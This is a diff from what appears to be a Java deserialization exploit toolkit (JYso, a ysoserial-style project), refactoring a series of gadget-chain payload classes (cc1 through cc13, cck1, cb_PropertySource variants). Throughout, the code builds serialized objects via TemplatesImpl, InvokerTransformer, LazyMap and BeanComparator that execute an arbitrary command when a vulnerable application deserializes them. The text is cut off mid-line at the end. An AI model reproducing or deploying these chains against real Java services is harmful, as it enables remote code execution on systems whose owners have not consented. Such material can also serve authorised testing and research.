||||||
final Object template;
|
final Object template;
|
||||||
template = Gadgets.createTemplatesImpl(command);
|
template = Gadgets.createTemplatesImpl(command);
|
||||||
ClassPool pool = ClassPool.getDefault();
|
|
||||||
pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator")));
|
|
||||||
final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator");
|
|
||||||
try {
|
|
||||||
CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID");
|
|
||||||
ctBeanComparator.removeField(ctSUID);
|
|
||||||
} catch (javassist.NotFoundException e) {
|
|
||||||
}
|
|
||||||
ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator));
|
|
||||||
final Comparator beanComparator = (Comparator) ctBeanComparator.toClass(new SuClassLoader()).newInstance();
|
|
||||||
ctBeanComparator.defrost();
|
|
||||||
Reflections.setFieldValue(beanComparator, "comparator", new ObjectToStringComparator());
|
|
||||||
|
|
||||||
|
Comparator beanComparator = getCbSink_2();
|
||||||
|
|
||||||
|
Reflections.setFieldValue(beanComparator, "comparator", new ObjectToStringComparator());
|
||||||
ObjectToStringComparator stringComparator = new ObjectToStringComparator();
|
ObjectToStringComparator stringComparator = new ObjectToStringComparator();
|
||||||
|
|
||||||
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, (Comparator<? super Object>) beanComparator);
|
return getCbSink_3(beanComparator, stringComparator, template);
|
||||||
|
|
||||||
queue.add(stringComparator);
|
|
||||||
queue.add(stringComparator);
|
|
||||||
|
|
||||||
Reflections.setFieldValue(queue, "queue", new Object[]{template, template});
|
|
||||||
Reflections.setFieldValue(beanComparator, "property", "outputProperties");
|
|
||||||
|
|
||||||
return queue;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -4,17 +4,13 @@ import com.qi4l.JYso.gadgets.annotation.Authors;
|
|||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import com.qi4l.JYso.gadgets.utils.SuClassLoader;
|
|
||||||
import javassist.ClassClassPath;
|
|
||||||
import javassist.ClassPool;
|
|
||||||
import javassist.CtClass;
|
|
||||||
import javassist.CtField;
|
|
||||||
import org.apache.logging.log4j.util.PropertySource;
|
import org.apache.logging.log4j.util.PropertySource;
|
||||||
|
|
||||||
import java.util.Comparator;
|
import java.util.Comparator;
|
||||||
import java.util.PriorityQueue;
|
|
||||||
|
|
||||||
|
import static com.qi4l.JYso.gadgets.cb_AttrCompare183.getCbSink_3;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unused"})
|
||||||
@Dependencies({"commons-beanutils:commons-beanutils:1.8.3", "commons-beanutils:commons-beanutils:1.7X"})
|
@Dependencies({"commons-beanutils:commons-beanutils:1.8.3", "commons-beanutils:commons-beanutils:1.7X"})
|
||||||
@Authors({"SummerSec"})
|
@Authors({"SummerSec"})
|
||||||
public class cb_PropertySource183 implements ObjectPayload<Object> {
|
public class cb_PropertySource183 implements ObjectPayload<Object> {
|
||||||
@@ -22,35 +18,11 @@ public class cb_PropertySource183 implements ObjectPayload<Object> {
|
|||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
final Object template;
|
final Object template;
|
||||||
template = Gadgets.createTemplatesImpl(command);
|
template = Gadgets.createTemplatesImpl(command);
|
||||||
PropertySource propertySource1 = new PropertySource() {
|
PropertySource propertySource1 = () -> 0;
|
||||||
@Override
|
|
||||||
public int getPriority() {
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
};
|
|
||||||
|
|
||||||
ClassPool pool = ClassPool.getDefault();
|
Comparator beanComparator = cb_AttrCompare183.getCbSink_2();
|
||||||
pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator")));
|
|
||||||
final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator");
|
|
||||||
try {
|
|
||||||
CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID");
|
|
||||||
ctBeanComparator.removeField(ctSUID);
|
|
||||||
} catch (javassist.NotFoundException e) {
|
|
||||||
}
|
|
||||||
ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator));
|
|
||||||
final Comparator beanComparator = (Comparator) ctBeanComparator.toClass(new SuClassLoader()).newInstance();
|
|
||||||
ctBeanComparator.defrost();
|
|
||||||
Reflections.setFieldValue(beanComparator, "comparator", new PropertySource.Comparator());
|
Reflections.setFieldValue(beanComparator, "comparator", new PropertySource.Comparator());
|
||||||
|
|
||||||
|
return getCbSink_3(beanComparator, propertySource1, template);
|
||||||
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, (Comparator<? super Object>) beanComparator);
|
|
||||||
|
|
||||||
queue.add(propertySource1);
|
|
||||||
queue.add(propertySource1);
|
|
||||||
|
|
||||||
Reflections.setFieldValue(queue, "queue", new Object[]{template, template});
|
|
||||||
Reflections.setFieldValue(beanComparator, "property", "outputProperties");
|
|
||||||
|
|
||||||
return queue;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -9,7 +9,7 @@ import org.apache.logging.log4j.util.PropertySource;
|
|||||||
|
|
||||||
import java.util.PriorityQueue;
|
import java.util.PriorityQueue;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2"})
|
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2"})
|
||||||
@Authors({"SummerSec"})
|
@Authors({"SummerSec"})
|
||||||
public class cb_PropertySource192 implements ObjectPayload<Object> {
|
public class cb_PropertySource192 implements ObjectPayload<Object> {
|
||||||
@@ -17,12 +17,7 @@ public class cb_PropertySource192 implements ObjectPayload<Object> {
|
|||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
final Object template;
|
final Object template;
|
||||||
template = Gadgets.createTemplatesImpl(command);
|
template = Gadgets.createTemplatesImpl(command);
|
||||||
PropertySource propertySource1 = new PropertySource() {
|
PropertySource propertySource1 = () -> 0;
|
||||||
@Override
|
|
||||||
public int getPriority() {
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
};
|
|
||||||
|
|
||||||
BeanComparator beanComparator = new BeanComparator(null, new PropertySource.Comparator());
|
BeanComparator beanComparator = new BeanComparator(null, new PropertySource.Comparator());
|
||||||
|
|
||||||
|
|||||||
@@ -42,16 +42,20 @@ import static com.qi4l.JYso.gadgets.utils.Utils.createMemoitizedProxy;
|
|||||||
@SuppressWarnings({"rawtypes", "unchecked", "unused"})
|
@SuppressWarnings({"rawtypes", "unchecked", "unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:3.1"})
|
@Dependencies({"commons-collections:commons-collections:3.1"})
|
||||||
@Authors({Authors.FROHOFF})
|
@Authors({Authors.FROHOFF})
|
||||||
public class cc1 implements ObjectPayload<InvocationHandler> {
|
public class cc1 implements ObjectPayload<Object> {
|
||||||
|
|
||||||
@Override
|
@Override
|
||||||
public InvocationHandler getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
|
|
||||||
final Transformer transformerChain = new ChainedTransformer(
|
final Transformer transformerChain = new ChainedTransformer(
|
||||||
new Transformer[]{new ConstantTransformer(1)});
|
new Transformer[]{new ConstantTransformer(1)});
|
||||||
// real chain for after setup
|
// real chain for after setup
|
||||||
final Transformer[] transformers = TransformerUtil.makeTransformer(command);
|
final Transformer[] transformers = TransformerUtil.makeTransformer(command);
|
||||||
|
|
||||||
|
return get_CC_Sink(transformerChain, transformers);
|
||||||
|
}
|
||||||
|
|
||||||
|
static Object get_CC_Sink(Transformer transformerChain, Transformer[] transformers) throws Exception {
|
||||||
final Map innerMap = new HashMap();
|
final Map innerMap = new HashMap();
|
||||||
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
|
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
|
||||||
final Map mapProxy = createMemoitizedProxy(lazyMap, Map.class);
|
final Map mapProxy = createMemoitizedProxy(lazyMap, Map.class);
|
||||||
|
|||||||
@@ -4,7 +4,6 @@ import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
|||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
|
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
|
||||||
import org.apache.commons.collections.Factory;
|
|
||||||
import org.apache.commons.collections.functors.ConstantTransformer;
|
import org.apache.commons.collections.functors.ConstantTransformer;
|
||||||
import org.apache.commons.collections.functors.FactoryTransformer;
|
import org.apache.commons.collections.functors.FactoryTransformer;
|
||||||
import org.apache.commons.collections.functors.InstantiateFactory;
|
import org.apache.commons.collections.functors.InstantiateFactory;
|
||||||
@@ -15,7 +14,7 @@ import javax.xml.transform.Templates;
|
|||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
import java.util.Map;
|
import java.util.Map;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:3.2.1"})
|
@Dependencies({"commons-collections:commons-collections:3.2.1"})
|
||||||
public class cc10 implements ObjectPayload<Object> {
|
public class cc10 implements ObjectPayload<Object> {
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
@@ -25,7 +24,7 @@ public class cc10 implements ObjectPayload<Object> {
|
|||||||
|
|
||||||
// 使用 InstantiateFactory 代替 InstantiateTransformer
|
// 使用 InstantiateFactory 代替 InstantiateTransformer
|
||||||
InstantiateFactory instantiateFactory = new InstantiateFactory(TrAXFilter.class, new Class[]{Templates.class}, new Object[]{templates});
|
InstantiateFactory instantiateFactory = new InstantiateFactory(TrAXFilter.class, new Class[]{Templates.class}, new Object[]{templates});
|
||||||
FactoryTransformer factoryTransformer = new FactoryTransformer((Factory) instantiateFactory);
|
FactoryTransformer factoryTransformer = new FactoryTransformer(instantiateFactory);
|
||||||
|
|
||||||
// 先放一个无关键要的 Transformer
|
// 先放一个无关键要的 Transformer
|
||||||
ConstantTransformer constantTransformer = new ConstantTransformer(1);
|
ConstantTransformer constantTransformer = new ConstantTransformer(1);
|
||||||
|
|||||||
@@ -1,5 +1,7 @@
|
|||||||
package com.qi4l.JYso.gadgets;
|
package com.qi4l.JYso.gadgets;
|
||||||
|
|
||||||
|
import com.qi4l.JYso.gadgets.annotation.Authors;
|
||||||
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import org.apache.commons.collections.functors.ConstantTransformer;
|
import org.apache.commons.collections.functors.ConstantTransformer;
|
||||||
@@ -16,6 +18,10 @@ import java.util.Map;
|
|||||||
* 需要调用其 connect 方法,因此需要调用任意方法的 Gadget,这里选择了 InvokerTransformer
|
* 需要调用其 connect 方法,因此需要调用任意方法的 Gadget,这里选择了 InvokerTransformer
|
||||||
* 直接传入 Base64 编码的序列化数据即可
|
* 直接传入 Base64 编码的序列化数据即可
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unchecked","unused"})
|
||||||
|
@Dependencies({"commons-collections:commons-collections:3.2.1"})
|
||||||
|
@Authors({Authors.QI4L})
|
||||||
public class cc11 implements ObjectPayload<Object> {
|
public class cc11 implements ObjectPayload<Object> {
|
||||||
|
|
||||||
@Override
|
@Override
|
||||||
|
|||||||
@@ -15,6 +15,7 @@ import java.lang.reflect.Field;
|
|||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
import java.util.Map;
|
import java.util.Map;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:3.2.1"})
|
@Dependencies({"commons-collections:commons-collections:3.2.1"})
|
||||||
@Authors({Authors.Jayl1n})
|
@Authors({Authors.Jayl1n})
|
||||||
public class cc12 implements ObjectPayload<Object> {
|
public class cc12 implements ObjectPayload<Object> {
|
||||||
|
|||||||
@@ -14,6 +14,7 @@ import org.apache.commons.collections.map.LazyMap;
|
|||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
import java.util.Map;
|
import java.util.Map;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:3.1"})
|
@Dependencies({"commons-collections:commons-collections:3.1"})
|
||||||
@Authors({Authors.UNAM4})
|
@Authors({Authors.UNAM4})
|
||||||
public class cc13 implements ObjectPayload<Object> {
|
public class cc13 implements ObjectPayload<Object> {
|
||||||
@@ -29,7 +30,6 @@ public class cc13 implements ObjectPayload<Object> {
|
|||||||
Reflections.setFieldValue(tiedMapEntry, "key", 233);
|
Reflections.setFieldValue(tiedMapEntry, "key", 233);
|
||||||
|
|
||||||
return hashMap;
|
return hashMap;
|
||||||
//return hashtable;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -11,7 +11,7 @@ import java.util.PriorityQueue;
|
|||||||
import java.util.Queue;
|
import java.util.Queue;
|
||||||
|
|
||||||
|
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
|
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
|
||||||
@Authors({Authors.FROHOFF})
|
@Authors({Authors.FROHOFF})
|
||||||
public class cc2 implements ObjectPayload<Queue<Object>> {
|
public class cc2 implements ObjectPayload<Queue<Object>> {
|
||||||
|
|||||||
@@ -4,20 +4,15 @@ import com.qi4l.JYso.gadgets.annotation.Authors;
|
|||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
||||||
import com.qi4l.JYso.gadgets.utils.JavaVersion;
|
import com.qi4l.JYso.gadgets.utils.JavaVersion;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
|
||||||
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
|
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
|
||||||
import org.apache.commons.collections.Transformer;
|
import org.apache.commons.collections.Transformer;
|
||||||
import org.apache.commons.collections.functors.ChainedTransformer;
|
import org.apache.commons.collections.functors.ChainedTransformer;
|
||||||
import org.apache.commons.collections.functors.ConstantTransformer;
|
import org.apache.commons.collections.functors.ConstantTransformer;
|
||||||
import org.apache.commons.collections.functors.InstantiateTransformer;
|
import org.apache.commons.collections.functors.InstantiateTransformer;
|
||||||
import org.apache.commons.collections.map.LazyMap;
|
|
||||||
|
|
||||||
import javax.xml.transform.Templates;
|
import javax.xml.transform.Templates;
|
||||||
import java.lang.reflect.InvocationHandler;
|
|
||||||
import java.util.HashMap;
|
|
||||||
import java.util.Map;
|
|
||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.createMemoitizedProxy;
|
import static com.qi4l.JYso.gadgets.cc1.get_CC_Sink;
|
||||||
|
|
||||||
|
|
||||||
/**
|
/**
|
||||||
@@ -25,7 +20,7 @@ import static com.qi4l.JYso.gadgets.utils.Utils.createMemoitizedProxy;
|
|||||||
* InvokerTransformer.
|
* InvokerTransformer.
|
||||||
*/
|
*/
|
||||||
|
|
||||||
@SuppressWarnings({"rawtypes", "unchecked", "restriction", "unused"})
|
@SuppressWarnings({"restriction", "unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:3.1"})
|
@Dependencies({"commons-collections:commons-collections:3.1"})
|
||||||
@Authors({Authors.FROHOFF})
|
@Authors({Authors.FROHOFF})
|
||||||
public class cc3 implements ObjectPayload<Object> {
|
public class cc3 implements ObjectPayload<Object> {
|
||||||
@@ -49,13 +44,6 @@ public class cc3 implements ObjectPayload<Object> {
|
|||||||
new Class[]{Templates.class},
|
new Class[]{Templates.class},
|
||||||
new Object[]{templatesImpl})};
|
new Object[]{templatesImpl})};
|
||||||
|
|
||||||
final Map innerMap = new HashMap();
|
return get_CC_Sink(transformerChain, transformers);
|
||||||
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
|
|
||||||
final Map mapProxy = createMemoitizedProxy(lazyMap, Map.class);
|
|
||||||
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
|
|
||||||
|
|
||||||
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
|
|
||||||
|
|
||||||
return handler;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -5,7 +5,6 @@ import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
|||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
|
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
|
||||||
import org.apache.commons.collections4.Transformer;
|
|
||||||
import org.apache.commons.collections4.comparators.TransformingComparator;
|
import org.apache.commons.collections4.comparators.TransformingComparator;
|
||||||
import org.apache.commons.collections4.functors.ChainedTransformer;
|
import org.apache.commons.collections4.functors.ChainedTransformer;
|
||||||
import org.apache.commons.collections4.functors.ConstantTransformer;
|
import org.apache.commons.collections4.functors.ConstantTransformer;
|
||||||
@@ -21,6 +20,7 @@ import java.util.Queue;
|
|||||||
* InvokerTransformer.
|
* InvokerTransformer.
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
|
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
|
||||||
@Authors({Authors.FROHOFF})
|
@Authors({Authors.FROHOFF})
|
||||||
public class cc4 implements ObjectPayload<Queue<Object>> {
|
public class cc4 implements ObjectPayload<Queue<Object>> {
|
||||||
@@ -39,7 +39,7 @@ public class cc4 implements ObjectPayload<Queue<Object>> {
|
|||||||
paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
|
paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
|
||||||
args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");
|
args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");
|
||||||
|
|
||||||
ChainedTransformer chain = new ChainedTransformer(new Transformer[]{constant, instantiate});
|
ChainedTransformer chain = new ChainedTransformer(constant, instantiate);
|
||||||
|
|
||||||
// create queue with numbers
|
// create queue with numbers
|
||||||
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
|
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
|
||||||
|
|||||||
@@ -13,7 +13,7 @@ import java.util.PriorityQueue;
|
|||||||
import static com.qi4l.JYso.gadgets.utils.jdk17Bypass.patchModule;
|
import static com.qi4l.JYso.gadgets.utils.jdk17Bypass.patchModule;
|
||||||
|
|
||||||
|
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Authors({Authors.JIECUB3})
|
@Authors({Authors.JIECUB3})
|
||||||
public class cc4_17 implements ObjectPayload<Object> {
|
public class cc4_17 implements ObjectPayload<Object> {
|
||||||
@Override
|
@Override
|
||||||
|
|||||||
@@ -2,7 +2,6 @@ package com.qi4l.JYso.gadgets;
|
|||||||
|
|
||||||
import com.qi4l.JYso.gadgets.annotation.Authors;
|
import com.qi4l.JYso.gadgets.annotation.Authors;
|
||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
|
||||||
import com.qi4l.JYso.gadgets.utils.cc.TransformerUtil;
|
import com.qi4l.JYso.gadgets.utils.cc.TransformerUtil;
|
||||||
import org.apache.commons.collections.Transformer;
|
import org.apache.commons.collections.Transformer;
|
||||||
import org.apache.commons.collections.functors.ChainedTransformer;
|
import org.apache.commons.collections.functors.ChainedTransformer;
|
||||||
@@ -10,11 +9,11 @@ import org.apache.commons.collections.keyvalue.TiedMapEntry;
|
|||||||
import org.apache.commons.collections.map.LazyMap;
|
import org.apache.commons.collections.map.LazyMap;
|
||||||
|
|
||||||
import java.io.Serializable;
|
import java.io.Serializable;
|
||||||
import java.lang.reflect.Field;
|
|
||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
import java.util.HashSet;
|
|
||||||
import java.util.Map;
|
import java.util.Map;
|
||||||
|
|
||||||
|
import static com.qi4l.JYso.gadgets.AspectJWeaver2.getSerializableCC6;
|
||||||
|
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Gadget chain:
|
* Gadget chain:
|
||||||
@@ -32,7 +31,7 @@ import java.util.Map;
|
|||||||
* <p>
|
* <p>
|
||||||
* by @matthias_kaiser
|
* by @matthias_kaiser
|
||||||
*/
|
*/
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings({"rawtypes","unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:3.1"})
|
@Dependencies({"commons-collections:commons-collections:3.1"})
|
||||||
@Authors({Authors.MATTHIASKAISER})
|
@Authors({Authors.MATTHIASKAISER})
|
||||||
public class cc6 implements ObjectPayload<Serializable> {
|
public class cc6 implements ObjectPayload<Serializable> {
|
||||||
@@ -45,43 +44,6 @@ public class cc6 implements ObjectPayload<Serializable> {
|
|||||||
final Map innerMap = new HashMap();
|
final Map innerMap = new HashMap();
|
||||||
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
|
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
|
||||||
TiedMapEntry entry = new TiedMapEntry(lazyMap, "QI4L");
|
TiedMapEntry entry = new TiedMapEntry(lazyMap, "QI4L");
|
||||||
HashSet map = new HashSet(1);
|
return getSerializableCC6(entry);
|
||||||
map.add("QI4L");
|
|
||||||
Field f = null;
|
|
||||||
try {
|
|
||||||
f = HashSet.class.getDeclaredField("map");
|
|
||||||
} catch (NoSuchFieldException e) {
|
|
||||||
f = HashSet.class.getDeclaredField("backingMap");
|
|
||||||
}
|
|
||||||
|
|
||||||
Reflections.setAccessible(f);
|
|
||||||
HashMap innimpl = (HashMap) f.get(map);
|
|
||||||
|
|
||||||
Field f2 = null;
|
|
||||||
try {
|
|
||||||
f2 = HashMap.class.getDeclaredField("table");
|
|
||||||
} catch (NoSuchFieldException e) {
|
|
||||||
f2 = HashMap.class.getDeclaredField("elementData");
|
|
||||||
}
|
|
||||||
|
|
||||||
Reflections.setAccessible(f2);
|
|
||||||
Object[] array = (Object[]) f2.get(innimpl);
|
|
||||||
|
|
||||||
Object node = array[0];
|
|
||||||
if (node == null) {
|
|
||||||
node = array[1];
|
|
||||||
}
|
|
||||||
|
|
||||||
Field keyField = null;
|
|
||||||
try {
|
|
||||||
keyField = node.getClass().getDeclaredField("key");
|
|
||||||
} catch (Exception e) {
|
|
||||||
keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
|
|
||||||
}
|
|
||||||
|
|
||||||
Reflections.setAccessible(keyField);
|
|
||||||
keyField.set(node, entry);
|
|
||||||
|
|
||||||
return map;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -15,7 +15,7 @@ import java.util.Map;
|
|||||||
/**
|
/**
|
||||||
* CC6的简化写法
|
* CC6的简化写法
|
||||||
*/
|
*/
|
||||||
@SuppressWarnings({"rawtypes", "unchecked"})
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:3.1"})
|
@Dependencies({"commons-collections:commons-collections:3.1"})
|
||||||
@Authors({Authors.SCRISTALLI, Authors.HANYRAX, Authors.EDOARDOVIGNATI})
|
@Authors({Authors.SCRISTALLI, Authors.HANYRAX, Authors.EDOARDOVIGNATI})
|
||||||
public class cc7 implements ObjectPayload<Hashtable> {
|
public class cc7 implements ObjectPayload<Hashtable> {
|
||||||
|
|||||||
@@ -4,14 +4,12 @@ import com.qi4l.JYso.gadgets.annotation.Authors;
|
|||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
import com.qi4l.JYso.gadgets.utils.Reflections;
|
||||||
import org.apache.commons.collections4.Transformer;
|
|
||||||
import org.apache.commons.collections4.bag.TreeBag;
|
import org.apache.commons.collections4.bag.TreeBag;
|
||||||
import org.apache.commons.collections4.comparators.TransformingComparator;
|
import org.apache.commons.collections4.comparators.TransformingComparator;
|
||||||
import org.apache.commons.collections4.functors.InvokerTransformer;
|
import org.apache.commons.collections4.functors.InvokerTransformer;
|
||||||
|
|
||||||
import java.util.Comparator;
|
|
||||||
|
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
|
@Dependencies({"org.apache.commons:commons-collections4:4.0"})
|
||||||
@Authors({"navalorenzo"})
|
@Authors({"navalorenzo"})
|
||||||
public class cc8 implements ObjectPayload<TreeBag> {
|
public class cc8 implements ObjectPayload<TreeBag> {
|
||||||
@@ -20,8 +18,8 @@ public class cc8 implements ObjectPayload<TreeBag> {
|
|||||||
final Object templates = Gadgets.createTemplatesImpl(command);
|
final Object templates = Gadgets.createTemplatesImpl(command);
|
||||||
|
|
||||||
InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
|
InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
|
||||||
TransformingComparator comp = new TransformingComparator((Transformer) transformer);
|
TransformingComparator comp = new TransformingComparator(transformer);
|
||||||
TreeBag tree = new TreeBag((Comparator) comp);
|
TreeBag tree = new TreeBag(comp);
|
||||||
tree.add(templates);
|
tree.add(templates);
|
||||||
Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
|
Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
|
||||||
return tree;
|
return tree;
|
||||||
|
|||||||
@@ -14,6 +14,7 @@ import javax.management.BadAttributeValueExpException;
|
|||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
import java.util.Map;
|
import java.util.Map;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:3.2.1"})
|
@Dependencies({"commons-collections:commons-collections:3.2.1"})
|
||||||
@Authors({"梅子酒"})
|
@Authors({"梅子酒"})
|
||||||
|
|
||||||
@@ -21,9 +22,9 @@ public class cc9 implements ObjectPayload<BadAttributeValueExpException> {
|
|||||||
|
|
||||||
public BadAttributeValueExpException getObject(String command) throws Exception {
|
public BadAttributeValueExpException getObject(String command) throws Exception {
|
||||||
|
|
||||||
ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{new ConstantTransformer(Integer.valueOf(1))});
|
ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{new ConstantTransformer(1)});
|
||||||
Transformer[] transformers = TransformerUtil.makeTransformer(command);
|
Transformer[] transformers = TransformerUtil.makeTransformer(command);
|
||||||
Map<Object, Object> innerMap = new HashMap<Object, Object>();
|
Map<Object, Object> innerMap = new HashMap<>();
|
||||||
Map defaultedmap = DefaultedMap.decorate(innerMap, chainedTransformer);
|
Map defaultedmap = DefaultedMap.decorate(innerMap, chainedTransformer);
|
||||||
TiedMapEntry entry = new TiedMapEntry(defaultedmap, "QI4L");
|
TiedMapEntry entry = new TiedMapEntry(defaultedmap, "QI4L");
|
||||||
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
|
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
|
||||||
|
|||||||
@@ -21,6 +21,7 @@ import java.util.Map;
|
|||||||
* templates...
|
* templates...
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"commons-collections:commons-collections:3.1"})
|
@Dependencies({"commons-collections:commons-collections:3.1"})
|
||||||
public class cck1 implements ObjectPayload<Object> {
|
public class cck1 implements ObjectPayload<Object> {
|
||||||
|
|
||||||
@@ -29,7 +30,7 @@ public class cck1 implements ObjectPayload<Object> {
|
|||||||
final Object templates;
|
final Object templates;
|
||||||
templates = Gadgets.createTemplatesImpl(command);
|
templates = Gadgets.createTemplatesImpl(command);
|
||||||
InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
|
